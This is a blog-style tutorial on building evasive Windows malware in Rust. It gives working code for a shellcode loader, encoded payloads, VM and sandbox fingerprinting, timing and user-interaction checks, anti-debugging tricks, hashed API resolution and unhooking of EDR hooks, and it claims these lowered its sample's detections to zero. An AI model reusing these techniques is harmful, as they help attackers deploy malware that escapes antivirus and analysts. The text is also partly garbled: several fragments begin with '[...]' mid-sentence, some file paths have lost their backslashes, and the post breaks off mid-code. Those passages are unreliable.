Advanced Malware Development: Injection, Obfuscation, and Evasion Techniques

Introduction:

From a very young age, I was fascinated by hacking and the concept of malware and computer viruses. As a naturally curious kid, I couldn't resist exploring how these programs worked, not with the intent to cause harm or distribute them, but to understand the underlying mechanisms. That curiosity led me to experiment with writing basic malware in a controlled environment, which in turn taught me invaluable lessons about system internals, low-level programming, and software behavior.

This early exploration laid the foundation for my current interest in reverse engineering real-world malware. Malware analysis is a challenging but incredibly rewarding process. There's a strong sense of accomplishment when you're able to successfully dissect, understand, and even patch malicious code. It’s a field that constantly pushes your limits, requiring a mix of analytical thinking, patience, and technical depth.

The purpose of this blog post is to dive into some of the more advanced and lesser-known techniques that malware authors use to evade detection and make reverse engineering difficult. These tactics range from anti-debugging and obfuscation to virtualization detection and code injection, each designed to frustrate analysts and outsmart traditional defense mechanisms.

Malware developers employ a variety of tricks to execute malicious code and hide their activities from detection. This comprehensive guide combines multiple techniques, from basic shellcode injection to advanced anti-analysis and obfuscation, into a cohesive overview. I assume you are familiar with Windows internals, reverse engineering, and malware concepts. Code examples are provided in idiomatic Rust (using the Windows API via the windows crate) or in x86_64 assembly where low-level system calls are needed.

The content presented in this blog post is for educational and research purposes only. The techniques, code examples, and methodologies discussed are intended solely to advance the understanding of malware development, reverse engineering, and evasion strategies. No malicious intent is implied or encouraged. All information is provided under the principles of fair use to educate security professionals, researchers, and students about potential vulnerabilities and defense mechanisms.

Please be aware that developing, deploying, or distributing malware is illegal and unethical. Any attempt to use the information contained in this post to create or propagate harmful software is strictly prohibited and may result in severe legal consequences. By using this material, you assume full responsibility for your actions and agree to comply with all applicable laws and regulations.

Basic Shellcode Injection and Execution

Shellcode is a small piece of machine code, often used as a payload to give an attacker control of a system (e.g. spawning a shell). To run shellcode from within a binary (without exploiting a vulnerability), the malware must explicitly load and execute it. A straightforward approach to run shellcode in the current process is:

- Allocate memory for the shellcode using VirtualAlloc.

- Copy the shellcode into the allocated memory.

- Change the memory protection to executable using VirtualProtect.

- Execute the shellcode by creating a new thread that starts at the shellcode address.

In Windows, this can be done using VirtualAlloc to allocate memory, memcpy (or RtlCopyMemory) to copy bytes, and CreateThread to execute the payload. Using the windows crate, it looks like this:

use windows::Win32::System::Memory::{VirtualAlloc, MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE_READWRITE};

use windows::Win32::System::Threading::{CreateThread, WaitForSingleObject, INFINITE};

use std::ffi::c_void;

unsafe {

// Example shellcode (x86-64) that just invokes ExitThread immediately

let shellcode: [u8; 5] = [0x48, 0x31, 0xC0, 0xC3, 0x00]; // simplified example

let size = shellcode.len();

// Allocate RWX memory for the shellcode

let exec_mem = VirtualAlloc(None, size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

// Copy shellcode into the allocated memory

std::ptr::copy_nonoverlapping(shellcode.as_ptr(), exec_mem as *mut u8, size);

// Create a new thread starting at the shellcode

let thread_handle = CreateThread(None, 0, Some(std::mem::transmute(exec_mem)), std::ptr::null_mut(), 0, None);

WaitForSingleObject(thread_handle, INFINITE);

}

This code allocates an executable memory region, copies shellcode into it, and starts a new thread at that address. The call to WaitForSingleObject ensures the host process waits for the shellcode thread to finish.

Why not just cast a function pointer to the shellcode array and call it? Modern operating systems enforce Data Execution Prevention (DEP) which disallows executing code on pages marked as data (like the stack or static data segments). Allocating a new memory page with explicit execute permissions is a reliable way to run arbitrary shellcode.

Shellcode Obfuscation: Simple Encryption Techniques

Malware often obfuscates or encrypts shellcode in the binary to avoid static detection signatures. Simple techniques like XOR encoding or ROT13 (byte rotation) can disrupt known byte patterns. The malware will decode or decrypt the shellcode at runtime before executing it.

ROT13 example: Each shellcode byte is “rotated” by 13 (0x0D). For instance, 0x41 becomes 0x4E (0x41 + 0x0D). Decoding simply subtracts 13 from each byte.

// Assume shellcode_encrypted is a ROT13 encoded byte array

let mut shellcode_encrypted: [u8; 3] = [0x41, 0x42, 0x43]; // example bytes

unsafe {

let exec_mem = VirtualAlloc(None, shellcode_encrypted.len(), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

std::ptr::copy_nonoverlapping(shellcode_encrypted.as_ptr(), exec_mem as *mut u8, shellcode_encrypted.len());

// Decode in place by subtracting 0x0D from each byte

for i in 0..shellcode_encrypted.len() {

let byte_ptr = (exec_mem as *mut u8).add(i);

*byte_ptr = (*byte_ptr).wrapping_sub(0x0D);

}

CreateThread(None, 0, Some(std::mem::transmute(exec_mem)), std::ptr::null_mut(), 0, None);

}

In this snippet, the shellcode bytes are adjusted in memory using a simple ROT13 decoding loop (wrapping_sub(0x0D) on each byte). An XOR cipher works similarly: e.g. *byte_ptr ^= 0x35 to XOR each byte with a constant key. Such simple ciphers are easily reversible by researchers, but they can defeat basic signature scanning and trivial antivirus heuristics.

Code Signing and Architecture Switching to Evade Detection

Beyond shellcode content, malware can appear more “legitimate” to security products through code signing and targeting less monitored architectures:

- Code Signing: Some antivirus engines flag any unsigned executable as suspicious. By signing malware with a digital certificate (even a self-generated or stolen one), the binary may evade these checks. In practice, malware authors create a rogue Certificate Authority and a code signing certificate, then use Windows signtool to sign the PE. This embeds a signature that can lower detection rates.

- Dropping Linker Metadata: Removing or altering certain PE metadata can reduce detection. For example, Visual Studio by default embeds the PDB (debug symbols) path in the binary. Clearing this (by building in Release mode without debug info, or even faking the path) can prevent leaking sensitive clues about the build environment. Similarly, linking the program with minimal default libraries (e.g. kernel32.lib references) may change the binary fingerprint enough to confuse simplistic detectors without actually removing access to core APIs (the API addresses are still resolved via the import table at load time).

- Architecture Switching: In many cases, 64-bit malware has a lower detection rate than 32-bit because some analysis sandboxes and signature databases focus on 32-bit code. Simply compiling the loader and using a 64-bit shellcode payload (e.g., windows/x64/shell_bind_tcp) can reduce alerts. In 2025, most Windows environments are x64, so targeting x64 is both viable and potentially stealthier. Always ensure the shellcode and host process architecture match (or use a WOW64 injection if needed).

By signing our malware and using a 64-bit payload, we make it appear more like benign software and avoid certain signatures. These steps alone dramatically lowered detection for our example shellcode runner.

Dynamic Analysis Evasion Techniques

Static protections aside, malware often must evade dynamic analysis, whether automated (sandboxes) or manual (analysts debugging in VMs). The key is to detect signs of an artificial environment and either delay or abort malicious actions when those signs are present. Modern sandboxes execute samples in virtualized, instrumented environments that often lack the full complexity of a normal user’s machine. Malware can perform many environment checks to decide if it’s running in a real victim system or under analysis.

Virtual Machine and Environment Fingerprinting

One class of checks is looking for characteristics of virtual machines or sandbox constraints:

- Hardware Resources: Many sandbox VMs are allocated minimal resources (e.g. 1 CPU core, 1GB RAM, small disk) unlike a typical user PC. Malware can query system info via WinAPI. For example, it can call GetSystemInfo to get the number of CPU cores, or GlobalMemoryStatusEx for total RAM, and DeviceIoControl for disk size. If cores < 2, RAM < 2048 MB, or disk < 100 GB, the program is likely running in a VM and could terminate or sleep indefinitely.

use windows::Win32::System::SystemInformation::{GetSystemInfo, GlobalMemoryStatusEx, SYSTEM_INFO, MEMORYSTATUSEX};

use windows::Win32::Storage::FileSystem::{CreateFileW, DeviceIoControl, IOCTL_DISK_GET_DRIVE_GEOMETRY, FILE_SHARE_READ, FILE_SHARE_WRITE, OPEN_EXISTING};

use windows::Win32::Foundation::HANDLE;

use std::ptr::null_mut;

let mut sysinfo = SYSTEM_INFO::default();

unsafe { GetSystemInfo(&mut sysinfo) };

if sysinfo.dwNumberOfProcessors < 2 {

std::process::exit(0);

}

let mut mem_status = MEMORYSTATUSEX::default();

mem_status.dwLength = std::mem::size_of::<MEMORYSTATUSEX>() as u32;

unsafe { GlobalMemoryStatusEx(&mut mem_status) };

let total_mb = mem_status.ullTotalPhys / (1024 * 1024);

if total_mb < 2048 {

std::process::exit(0);

}

// Disk size check (PhysicalDrive0)

let drive = unsafe { CreateFileW("\\.\PhysicalDrive0", 0, FILE_SHARE_READ|FILE_SHARE_WRITE, null_mut(), OPEN_EXISTING, 0, HANDLE(0)) };

let mut geom = [0u8; 24]; // DISK_GEOMETRY structure size

let mut returned = 0;

unsafe {

DeviceIoControl(drive, IOCTL_DISK_GET_DRIVE_GEOMETRY, None, 0, Some(&mut geom), geom.len() as u32, &mut returned, None);

}

// (In practice, parse geom to get disk size and compare against threshold)

In this snippet, if the environment doesn’t meet basic specs, the malware exits early. Simple checks like these brought our sample’s sandbox detection rate to zero (no sandbox executed the payload) because the sandbox environment was deemed unrealistic and the malware quit.

- [...] "VBOX" appears (VirtualBox disk) or "VMWARE", it’s a red flag. Similarly, malware can attempt to open known virtual device interfaces like the VirtualBox guest IPC pipe (\\.\pipe\VBoxTrayIPC) or special device objects (\\Device\\VBoxGuest). If those open successfully, it likely means a VM is running. One could call low level NT APIs (NtCreateFile) for those device paths.

- [...] GetAdaptersAddresses and checking the MAC prefix, malware can detect VMs. For example, 08-00-27 is a known VirtualBox MAC prefix. If any adapter’s MAC starts with that, the malware can assume it’s in VirtualBox and bail out.

- [...] C:\Windows\System32\VBoxService.dll or registry keys like HKLM\SYSTEM\CurrentControlSet\Services\VBoxGuest. The presence of these indicates VirtualBox tools installed (hence a VM). Checking for a file can be as simple as:

if std::path::Path::new(r"C:WindowsSystem32VBoxService.dll").exists() {

std::process::exit(0);

}

or using the Windows registry via the winreg crate or Windows API for registry queries.

By combining several such checks (hardware, devices, MAC, files), malware can fingerprint the environment. Our example implemented CPU, RAM, and disk checks and went from being detected as malicious to zero antivirus detections, because automated sandbox analysis did not even fully execute the payload after these guards.

Automated Sandbox Detection and User Interaction

Automated sandboxes often lack real Internet connectivity and user input. Malware leverages this by requiring conditions that a sandbox likely won’t satisfy:

- Internet Reachability: Some malware tries to contact an external server and only proceeds if the network is available. A simple approach is to perform an HTTP GET request to a benign URL and check for a success response. In a disconnected sandbox, the request will fail (or be blackholed), cueing the malware to stop. For example, using WinHTTP in Rust (via FFI or windows crate):

use windows::Win32::Networking::WinHttp::*;

unsafe {

let session = WinHttpOpen("Mozilla/5.0", WINHTTP_ACCESS_TYPE_NO_PROXY, None, None, 0);

let conn = WinHttpConnect(session, "example.com", INTERNET_DEFAULT_HTTP_PORT, 0);

let req = WinHttpOpenRequest(conn, "GET", "/test", None, None, None, 0);

let sent = WinHttpSendRequest(req, None, 0, None, 0, 0, 0);

if sent.as_bool() {

WinHttpReceiveResponse(req, None);

}

if !sent.as_bool() {

std::process::exit(0); // No internet, likely sandbox

}

}

If the request cannot be sent, we assume no real internet is present and exit. In our tests, adding a network check prevented the sandbox from capturing our payload’s network indicators (the sandbox couldn’t extract the C2 server IP since the malware never executed that far unless Internet was present).

- [...] MessageBox) and only proceed if the user clicks a certain button. For instance:

use windows::Win32::UI::WindowsAndMessaging::{MessageBoxW, MB_YESNOCANCEL, IDYES};

use windows::Win32::Foundation::HWND;

let res = unsafe { MessageBoxW(HWND(0), "Do you want to update now?", "Updater", MB_YESNOCANCEL) };

if res == IDYES {

// If 'Yes' was clicked (which a sandbox is unlikely to do), exit or postpone

std::process::exit(0);

}

In this example, if a sandbox auto-clicks "Yes" or a curious analyst does so, the malware chooses not to proceed. A real user might ignore the dialog or click "No", in which case the malware continues.

Another stealthy check is monitoring mouse movement over time. A loop can poll cursor positions via GetCursorPos and compute a running distance traveled. A human user will accumulate significant mouse movement, whereas a sandbox (with no mouse input) will not. For example:

use windows::Win32::UI::WindowsAndMessaging::GetCursorPos;

use windows::Win32::Foundation::POINT;

use std::thread::sleep;

use std::time::Duration;

let mut prev = POINT::default();

unsafe { GetCursorPos(&mut prev) };

let mut distance = 0.0_f64;

loop {

let mut cur = POINT::default();

unsafe { GetCursorPos(&mut cur) };

let dx = cur.x - prev.x;

let dy = cur.y - prev.y;

distance += ((dx * dx + dy * dy) as f64).sqrt();

prev = cur;

if distance > 20000.0 {

break; // significant mouse movement observed

}

sleep(Duration::from_millis(100));

}

This loop waits until the cursor has moved a total of 20,000 pixels (combined). On a real desktop, a user’s activity would typically trigger this within a minute or two. In a sandbox, this threshold might never be reached, causing the malware to stall (possibly beyond the analysis timeout). Indeed, when we added a mouse movement check, only the most baseline antivirus (Defender) flagged our sample, and the sandbox failed to capture any malicious behavior since it timed out while “waiting” for input.

- [...] %APPDATA%\Microsoft\Windows\Recent\*). If there are fewer than, say, 20 entries, the system might be a sandbox or newly created VM. Checking this could involve listing that directory and counting non-special files:

let recent_dir = dirs::data_dir().unwrap().join("Microsoft\Windows\Recent");

let file_count = std::fs::read_dir(recent_dir).map(|iter| iter.filter_map(Result::ok).count()).unwrap_or(0);

if file_count < 20 {

std::process::exit(0);

}

(In practice, one would exclude . and .. entries and perhaps look at shortcuts inside the Recent folder.)

- [...] GetTickCount64), or that a normal number of processes is running (sandbox VMs might be very minimal). For example, calling EnumProcesses and expecting > 50 processes, otherwise exit.

These indicators, while not foolproof individually, make it very likely when combined that the malware will only fully execute on a real user’s machine and not inside a constrained analysis sandbox.

Delaying and Hiding Malicious Execution

Even if malware cannot outright detect a sandbox, it may try to delay execution to outwait the sandbox’s analysis window. A naive delay using Sleep(60000) might be bypassed by sandbox tricks (some sandboxes accelerate the guest clock or patch Sleep). More clever approaches include:

- Measuring Real Time vs. Sleep: The malware can sample a high resolution timer or tick count, perform a Sleep, then measure time again. If the elapsed time is significantly less than expected, a sandbox likely manipulated the Sleep. For instance:

use windows::Win32::System::Diagnostics::ToolHelp::GetTickCount64;

use windows::Win32::System::Threading::NtDelayExecution;

use windows::Win32::Foundation::NTSTATUS;

let t1 = unsafe { GetTickCount64() };

// Use NtDelayExecution for a 100 second sleep (more obscure than Sleep API)

let hundred_seconds = -10000 * 100_000; // relative time in 100ns units

unsafe {

// Signature: NtDelayExecution(alertable: BOOLEAN, interval: *const i64) -> NTSTATUS

NtDelayExecution(false.into(), &hundred_seconds);

}

let t2 = unsafe { GetTickCount64() };

if (t2 - t1) < 100_000 {

std::process::exit(0); // Expected ~100000ms, got less -> likely fast-forwarded, so exit

}

Here we use the native NtDelayExecution (accessible via the windows crate) to sleep, which might not be as commonly hooked as Sleep. We also directly inspect GetTickCount64() before and after. In a real 100 second sleep, ~100000 milliseconds should pass. If a sandbox accelerated the wait, the difference will be much smaller, and the malware detects manipulation.

- [...] 0x7FFE0000 in user mode, which includes a continuously updated system time and tick count that some sandboxes may neglect to alter. By comparing GetTickCount64() to the value in this shared memory, one can detect inconsistencies introduced by hooking or accelerating timers. For example (in C or Rust with unsafe pointer reads), if the two sources differ significantly after a Sleep, it suggests an analysis environment tampered with timing.

All these time-based techniques serve to frustrate automated analysis by making malware execution conditional or prolonged beyond what sandboxes are willing to tolerate.

Debugger Detection Techniques

When an analyst is manually debugging malware, the malware can use many tricks to detect the debugger’s presence and disrupt analysis. These anti-debug techniques range from simple API calls to complex hardware tricks:

- Debugger Presence APIs: The easiest check is asking the OS if a debugger is attached. Windows provides IsDebuggerPresent(), which returns true if the current process is being debugged. Similarly, CheckRemoteDebuggerPresent() (or the underlying NtQueryInformationProcess with ProcessDebugPort) can detect if any process (including itself) is being debugged. The simplest form of the check is:

use windows::Win32::System::Diagnostics::Debug::IsDebuggerPresent;

if unsafe { IsDebuggerPresent() }.as_bool() {

std::process::exit(0);

}

Under the hood, this checks a flag in the Process Environment Block (PEB) of the process (BeingDebugged byte). Malware could also directly read this flag via inline assembly or the GS segment on x64 (since PEB is at gs:[0x60]). For example, in x86_64 assembly:

mov rax, gs:[0x60] ; get PEB address

mov al, [rax+0x2] ; load BeingDebugged flag (at offset 0x2)

test al, al

jnz debugger_detected ; if non-zero, a debugger is present

- NtGlobalFlag in the PEB (offset 0xBC on 64-bit) has certain bits set when a process is launched under a debugger (e.g., heap tail checking flags). Malware can check if NtGlobalFlag has the value 0x70 (common when debug heap is enabled). Another pair of values are in the default process heap (HeapFlags and HeapForceFlags), which tend to be modified by debuggers (e.g., HeapForceFlags becomes 0xFFFFFFFF in a debugging session). By inspecting these, malware can infer a debugger. These fields are not documented in high level APIs, but can be read via pointer arithmetic on the PEB and heap structures.

- [...] INT 3 (DebugBreak() in WinAPI) inside a __try/__except block. If the exception handler runs, it means no debugger intercepted the breakpoint. (Note: Rust does not have native SEH like C/C++ on Windows, but we can simulate this check with IsDebuggerPresent(), or by invoking DebugBreak() and catching the exception using Windows APIs or an external crate like seh, though the latter is limited. So we can use Windows SEH via FFI or a VEH, my preferred method, as shown below.)

For example, in C:

bool debugged = true;

__try {

DebugBreak(); // cause INT3 interrupt

} __except(EXCEPTION_EXECUTE_HANDLER) {

debugged = false; // we handled it ourselves, meaning no external debugger

}

if (debugged) ExitProcess(0);

Additionally, as mentioned, you can also use FFI to call C functions that leverage __try/__except. However, this method is generally not recommended due to its limited portability. Since __try/__except is an MSVC-specific language extension and not directly usable in Rust, the typical approach involves a small C shim:

// seh_check.c

#include <windows.h>

__declspec(dllexport) BOOL is_debugger_present_via_seh() {

BOOL debugged = TRUE;

__try {

DebugBreak();

} __except (EXCEPTION_EXECUTE_HANDLER) {

debugged = FALSE;

}

return debugged;

}

Compile it to a DLL or static lib, and then in Rust:

extern "C" {

fn is_debugger_present_via_seh() -> i32;

}

use windows::Win32::System::Threading::ExitProcess;

fn main() {

unsafe {

if is_debugger_present_via_seh() != 0 {

ExitProcess(0);

}

}

println!("Not being debugged!");

}

The malware deliberately causes a breakpoint and uses a structured exception handler (SEH) to catch it. If a debugger was active, it would have trapped the INT3 before SEH, and the __except block wouldn’t set debugged to false, leading the malware to conclude it is being debugged. A similar approach is to use RaiseException(EXCEPTION_BREAKPOINT, ...) to generate a fake breakpoint; some debuggers mishandle these, leading to chaos in the analysis (this can even create an exception loop if the debugger continuously tries to run past the injected breaks).

- [...] AddVectoredExceptionHandler. For example, a handler that specifically checks for breakpoint exceptions:

use windows::Win32::System::Diagnostics::Debug::{AddVectoredExceptionHandler, RemoveVectoredExceptionHandler, EXCEPTION_POINTERS, EXCEPTION_CONTINUE_EXECUTION, EXCEPTION_CONTINUE_SEARCH, EXCEPTION_BREAKPOINT};

unsafe extern "system" fn veh_breakpoint_filter(exc: *mut EXCEPTION_POINTERS) -> i32 {

let record = &*((*exc).ExceptionRecord);

if record.ExceptionCode == EXCEPTION_BREAKPOINT {

// Skip the breakpoint by advancing instruction pointer

(*(*exc).ContextRecord).Rip += 1;

return EXCEPTION_CONTINUE_EXECUTION;

}

EXCEPTION_CONTINUE_SEARCH

}

unsafe {

AddVectoredExceptionHandler(1, Some(veh_breakpoint_filter));

// Trigger a breakpoint:

core::arch::asm!("int3");

RemoveVectoredExceptionHandler(Some(veh_breakpoint_filter));

}

In this Rust snippet, we register a VEH that catches INT3 and continues execution by manually incrementing the RIP (instruction pointer) past the int3 instruction. If a user mode debugger isn’t present, our handler will execute and skip over the breakpoint (thus int3 has no effect). If a debugger is attached, it will catch the int3 before the VEH, and the VEH might not even get called or might see different state. We can set a flag in the handler to indicate if it ran. After executing an int3 instruction (via inline asm), if our handler did run, it implies no debugger (or at least none that intercepted the exception).

Using VEH or SEH this way allowed our sample to detect debugging by common tools (WinDbg, Visual Studio’s debugger). The malware would terminate when run under those debuggers, but continue normally outside them.

- [...] 0xCC (INT3). Malware can checksum or scan its own code sections to detect these modifications. For instance, it can compute a hash of critical function bytes at runtime and compare it against a known “clean” hash. Any mismatch could indicate a breakpoint or patch. A simple implementation is to place a marker at the end of a function and compute a sum of bytes up to that marker, comparing with a precomputed value. If a debugger has placed an INT3, the sum will differ. This requires knowing the function’s address range (which can be done via a dummy function or linker symbol). While robust, note that advanced debuggers can also use hardware breakpoints (which don’t modify code), so malware often includes multiple detection methods.

- [...] GetThreadContext API, requesting CONTEXT_DEBUG_REGISTERS. If any of DR0–DR3 are non-zero, a hardware breakpoint is set on the thread. We could use GetThreadContext from the windows crate to retrieve a CONTEXT struct and inspect the Dr0..Dr3 fields. If any are set, it indicates a breakpoint watch, and the malware can react (e.g. exit or misbehave to thwart the debugger).

- [...] KdDebuggerEnabled in the PEB. If this flag is set, it indicates a kernel debugger (like WinDbg) is present. This is a more advanced check and can be done via inline assembly or by reading the PEB directly.

- [...] VirtualQuery or QueryWorkingSet. If any normally shared code page is now private (indicating it was modified, likely by a breakpoint), that’s a sign of a debugger. This is an advanced check: the malware gets a list of all memory pages, filters those that are executable, and sees if their share count is 0 (meaning the page is no longer shared with other processes, which happens when an INT3 is written to it). This technique can pinpoint stealth breakpoints that simple checksum scans might miss.

In summary, anti-debug techniques attempt to make the malware terminate or alter behavior when under observation. Our combined approach (PEB flag checks, raising breakpoints, and checking DR registers) makes it quite troublesome for an analyst to single-step through the code without being detected. A skilled reverse engineer can bypass these, but it slows them down significantly, buying the malware time to operate before it’s fully understood.

Anti-Static Analysis and Binary Obfuscation

Static analysis involves examining the malware file without executing it. Malware can be packed or obfuscated to frustrate this process:

- Polymorphism (Changing Hash): The simplest trick to evade signature based detection is to ensure the file hash changes on each build. Even adding a dummy byte or altering metadata will yield a completely different MD5/SHA-1. Malware build systems might append a random byte to the end of the file or slightly tweak an embedded resource (like an icon) each time. We can automate this by, for example, renaming the file on disk after first launch and writing a null byte to the new copy, or storing the malware’s body encrypted and decrypting it at runtime (making static hashing of the stored form useless).

- Self-Deletion or Mutation: Some malware even rewrites its own file on disk to a new variant once executed. For instance, it can copy itself to a new file with one bit flipped (to change the hash) and delete the original. This polymorphism means any collected sample might be unique.

- Import Table Hiding: Analysts glean a lot from the Import Address Table (IAT) of a PE. It lists which Windows APIs the malware uses (e.g. presence of VirtualAlloc, WinHttpOpen can reveal intentions). Malware can obscure this by resolving APIs at runtime instead of linking them explicitly. One approach is to only import LoadLibrary and GetProcAddress, then call those to get addresses of all other needed functions dynamically. We could call GetProcAddress for functions by name:

use windows::Win32::System::LibraryLoader::{GetModuleHandleW, GetProcAddress};

let k32 = unsafe { GetModuleHandleW("kernel32.dll") }.unwrap();

let VirtualAlloc: extern "system" fn(_, usize, u32, u32) -> *mut c_void = unsafe {

std::mem::transmute(GetProcAddress(k32, "VirtualAlloc"))

};

// ... similarly resolve CreateThread, etc.

By doing this, the only imports visible in the PE might be LoadLibraryA and GetProcAddress (and those can be further hidden as well). A static analyst now has no easy way to see which APIs will be called; they’d have to emulate or run the code to find out.

- [...] GetProcAddress(kernel32, "VirtualAlloc"), malware can pre-compute a hash (e.g. DJB2 or CRC32) for each target API name and store only the hashes. At runtime, it enumerates all exports of kernel32.dll (by parsing the PE export table in memory) and hashes each export name, comparing to the stored hashes to find matches. This way, strings like "VirtualAlloc" or "CreateThread" never appear in the binary. Here’s an illustrative snippet in Rust that hashes exported function names to find a target function:

fn hash_name(name: &str) -> u32 {

let mut hash = 5381u32;

for &b in name.as_bytes() {

hash = ((hash << 5).wrapping_add(hash)).wrapping_add(b as u32);

}

hash

}

let target_hash = 0x80fa57e1; // pretend hash for VirtualAlloc

// Obtain base address of kernel32 (already loaded in process)

let k32_base = k32 as usize;

// Parse PE structures of kernel32 in memory...

// (For brevity, not showing full PE parsing. One would locate the Export Directory and iterate names)

// For each export name:

// if hash_name(export) == target_hash => retrieve its function pointer.

Implementing this requires manual PE parsing (reading DOS header, NT headers, export directory, etc.), which is doable in Rust with some unsafe code or a library. The end result is that even if an analyst dumps the malware’s strings, they’ll see only obscure constants instead of telling API names.
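From the reverse engineer's side, the usual answer to hashed imports is to run the same hash over a list of known export names and look up the constants found in the sample. The following is a minimal sketch of that lookup, assuming DJB2 exactly as in hash_name above; the name list, the build_lookup helper, and the "recovered" constant are hypothetical stand-ins, and a real table would be built from the full export lists of the relevant DLLs.

```rust
use std::collections::HashMap;

/// DJB2 hash, written to match the `hash_name` function shown above.
fn djb2(name: &str) -> u32 {
    let mut hash = 5381u32;
    for &b in name.as_bytes() {
        hash = (hash << 5).wrapping_add(hash).wrapping_add(b as u32);
    }
    hash
}

/// Build a reverse lookup table from hash value to export name.
/// (Hypothetical helper for illustration.)
fn build_lookup<'a>(names: &[&'a str]) -> HashMap<u32, &'a str> {
    names.iter().map(|&n| (djb2(n), n)).collect()
}

fn main() {
    // Abbreviated, hypothetical name list.
    let known_exports = ["VirtualAlloc", "CreateThread", "LoadLibraryA", "GetProcAddress"];
    let table = build_lookup(&known_exports);

    // Stand-in for a constant recovered from a sample's disassembly.
    let recovered = djb2("CreateThread");

    match table.get(&recovered) {
        Some(name) => println!("{recovered:#010x} -> {name}"),
        None => println!("{recovered:#010x} -> unknown"),
    }
}
```

Because the hash is deterministic and unkeyed, the table only has to be built once per hash algorithm and can then be reused across samples.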

- [...] .text or .data and ensure the raw vs. virtual size of sections are plausible. It can also embed malicious data in resources or other sections that seem innocuous. For instance, placing an encrypted configuration blob in the .rsrc (resource) section with a normal looking resource entry (like an icon or version info) can hide it from cursory inspection. High entropy in a section can indicate encrypted content, so sometimes malware authors will double encode or compress data and then pad it to normalize entropy or even blend it with random bytes to appear more benign.

- [...] 0x0 or a date far in the past/future) to avoid giving away build time. This can be done by post processing the PE with a tool or using a linker option. While not a heavy defense, it’s a common anti-attribution trick.

- Instruction substitution: Replacing straightforward operations with convoluted equivalent sequences (e.g., replace c = a + b with a series of operations that ultimately add a and b but involve random intermediate calculations). This makes the decompiled output harder to read.

- Bogus control flow: Inserting always-true or always-false conditions that the compiler knows how to optimize, but an analyst sees extra if statements or jumps that obfuscate the real flow.

- Control flow flattening: Reordering code into a switch within a loop, so that what used to be a structured sequence of calls is now scrambled into a state machine. The actual order of execution is determined by a hidden state variable, making it non-obvious in static disassembly.

These techniques aim to defeat disassemblers and decompilers by making the code logic opaque. For instance, a simple loop might be transformed into a dozen smaller blocks linked by gotos or switch case constructs, which when decompiled looks like a complex graph rather than a neat loop.



In practice, we compiled a standard reverse shell program with multiple LLVM obfuscation passes. The unobfuscated version was detected by 1/54 engines on VirusTotal, whereas the obfuscated one was detected by 6/54 (in this case, the obfuscation increased suspicion, likely due to its atypical patterns). This shows that while compiler obfuscation can hinder manual analysis, it may also trigger heuristic detection. It's a balancing act and an arms race.



(These images show the stark contrast between an entry point before and after applying LLVM based obfuscation. The original (top) is clean and easy to follow, while the obfuscated version (bottom) demonstrates complex control flow and added junk instructions, making reverse engineering significantly more difficult.)

constexpr to hide data or computations at compile time. For example, a string literal (like a URL or API key) can be obfuscated by a constexpr function so that the actual bytes stored in the binary are XORed and only reconstructed at runtime via a function. Using a macro, developers can transform Obfuscate("secret") into a template that XORs the string at compile time and provides a function to decrypt it at runtime. This means the plaintext "secret" never appears in the binary; instead you have an encrypted blob and a routine to decrypt it when needed. Such techniques leverage the compiler’s ability to execute code during compilation (C++ templates/constexpr act as a built in code generator). Several frameworks (like ADVobfuscator) exist to automate this. From a reverse engineer’s perspective, seeing a call to something like decrypt_string(X0X0X0) with no obvious plaintext in the binary means extra work to understand what data is being revealed at runtime.

Overall, anti static analysis measures aim to make binaries unique per build, hard to parse, and conceal meaningful constants and strings. Our malware integrated a simple form of this by dynamically resolving APIs and encoding strings, making it much more challenging to analyze by just loading it into a tool like IDA or Ghidra without actually running the code.
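From the analyst's side, the entropy signal mentioned earlier in this section is easy to measure. The sketch below computes Shannon entropy in bits per byte over a buffer. The function name shannon_entropy is made up for this example, and the inputs are synthetic byte arrays, not real PE sections. Values close to 8 suggest compressed or encrypted data, while plain text and padded regions score much lower.

```rust
/// Shannon entropy of a byte slice, in bits per byte (0.0 to 8.0).
fn shannon_entropy(data: &[u8]) -> f64 {
    if data.is_empty() {
        return 0.0;
    }
    // Count how often each byte value occurs.
    let mut counts = [0usize; 256];
    for &b in data {
        counts[b as usize] += 1;
    }
    let len = data.len() as f64;
    // Sum p * log2(1/p) over every byte value that actually appears.
    counts
        .iter()
        .filter(|&&c| c > 0)
        .map(|&c| {
            let p = c as f64 / len;
            p * (1.0 / p).log2()
        })
        .sum()
}

fn main() {
    // Every byte value exactly once: the maximum possible entropy.
    let uniform: Vec<u8> = (0..=255u8).collect();
    // A run of identical bytes, like padding: the minimum.
    let padding = vec![0x41u8; 1024];
    // Ordinary ASCII text sits somewhere in between.
    let text = b"This program cannot be run in DOS mode.";

    println!("uniform: {:.3}", shannon_entropy(&uniform));
    println!("padding: {:.3}", shannon_entropy(&padding));
    println!("text:    {:.3}", shannon_entropy(text));
}
```

Running this per section of a binary is a common first triage step, which is exactly why the padding and blending tricks described above exist.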

Hook Detection and Direct Syscall Evasion

Modern antivirus (AV) and Endpoint Detection & Response (EDR) systems commonly hook API functions in user mode to monitor or intercept malicious calls. For example, an EDR might hook NtCreateThreadEx or VirtualAlloc to detect code injection attempts. Malware can counter this by detecting hooks and bypassing them via direct system calls.

- Function Hook Detection: A typical inline hook overwrites the first few bytes of a target API (often with a jump instruction to the monitoring code). Malware can detect this by comparing the in memory bytes of a function to the expected bytes from disk. For instance, it can load a fresh copy of ntdll.dll from disk into memory (without executing it) and then compare the first instructions of NtCreateThreadEx in the loaded image to those in the process’s memory. If they differ, a hook is present. In Rust, we can open the file and memory map it, then locate the function’s offset via the export table (similar to the earlier API hashing technique). Pseudocode for detection:

let ntdll_disk = std::fs::File::open(r"C:\Windows\System32\ntdll.dll").unwrap();

let disk_map = unsafe { memmap2::Mmap::map(&ntdll_disk).unwrap() };

// Find NtCreateThreadEx offset in disk_map by parsing PE export table...

let orig_bytes = &disk_map[orig_offset..orig_offset+16];

// Get pointer to loaded NtCreateThreadEx in this process:

let loaded_ptr = GetProcAddress(GetModuleHandleW("ntdll.dll"), "NtCreateThreadEx");

let mem_bytes = unsafe { std::slice::from_raw_parts(loaded_ptr as *const u8, 16) };

if mem_bytes != orig_bytes {

// Hook detected

// (We could optionally restore the original bytes in memory to unhook)

}

If a hook is detected, malware can choose to unhook the function by copying the original bytes from the clean image over the hooked bytes in memory (after making the page writable with VirtualProtect). This effectively neuters the user mode hook. The code snippet below demonstrates fixing a hook on MessageBoxW for illustration:

use windows::Win32::System::Memory::VirtualProtect;

